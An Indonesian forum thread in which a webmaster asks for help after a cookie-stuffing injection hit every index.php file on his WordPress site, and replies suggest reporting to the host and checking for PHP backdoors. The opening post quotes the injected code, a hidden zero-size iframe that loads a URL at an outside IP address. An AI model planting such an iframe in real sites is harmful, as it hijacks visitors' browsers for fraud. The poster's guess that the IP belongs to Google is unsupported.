1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

[ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan?

Discussion in 'Hosting & Domain' started by reccountme, Oct 18, 2014.

Tags:
  1. reccountme

    reccountme Ads.id Pro

    Joined:
    Jun 12, 2013
    Messages:
    364
    Likes Received:
    24
    selamat pagi teman2,
    Pagi2 sudah dikagetkan dengan situs saya yang tidak dapat diakses, dan errornya terpampang pada halaman web :((. error terdapat pada halaman index.php pada situs wordpress. saya coba membuka pada cpanel dan file index.php, ternyata index.php saya terinject dengan cookies stuffing , potongan script injectednya sebagai berikut
    PHP:
    /** Loads the WordPress Environment and Template */require( dirname__FILE__ ) . '/wp-blog-header.php' );<html><body><iframe src="hxxp://217.12.207.44/c82f?default_keyword=newftp&referrer=all_frp&source=google.ru" width="0" height="0" align="none"></body></html>
    si hacker berusaha menyusupkan script cookies stuffing pada halaman index.php saya, dan ternyata setiap file index.php saya sudah disusupi,saya mencoba mengakses url 217.12.207.44, dan itu alamat ip google rusia.

    yang ingin saya tanyakan,
    1. setelah saya bersihkan file2 html saya, password apa yang harus segera saya rubah ?
    2. Untuk menghindari terjadi hal semacam ini / proteksi apa yang perlu saya lakukan ?
    3. Apakah saya harus lapor pada pihak hosting ? (saya hosting pada mast*rw*b)

    terimakasih

    makasih gan, sementara mast*rw*b agak lemot, mungkin perbaikan, saya sudah kirim tiket support, terpaksa saya harus scanning satu persatu file saya.
     
    Last edited: Oct 18, 2014
    reccountme, Oct 18, 2014
    #1
  2. bius230386

    bius230386 Ads.id Fan

    Joined:
    Jul 26, 2014
    Messages:
    221
    Likes Received:
    4
    Re: [ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan

    pihak hosting gan lapor aja takutnya dia udah nanem backdoor php kena lagi pasti walau udah ganti password juga , klo ama pihak hosting dia cari file baru yg di indentifikasi backdoor jd aman dan ganti password agan
     
    bius230386, Oct 18, 2014
    #2
  3. andiklive

    andiklive Super Hero

    Joined:
    Feb 4, 2012
    Messages:
    1,569
    Likes Received:
    103
    Location:
    Kurniawan Technologies
    Re: [ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan

    index.php core wordpress atau index.php themes???
    kalau index.php core dari sisi host yang gak secure kalau gak user sendiri yang lalai...
    kalau index.php themes pastikan pake themes yang legal, kalau nulled udah biasa kayaknya kejadian gitu... :D
     
    andiklive, Oct 18, 2014
    #3
  4. reccountme

    reccountme Ads.id Pro

    Joined:
    Jun 12, 2013
    Messages:
    364
    Likes Received:
    24
    Re: [ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan

    index.php core wordpress yang kena, dan seluruh file dengan nama index.php. kalau theme saya pakai theme bawaan wordpress :) , sudah open ticket katanya yang yang bermasalah script saya yang ga secure , jadi bingung sendiri :-B
     
    reccountme, Oct 19, 2014
    #4

Share This Page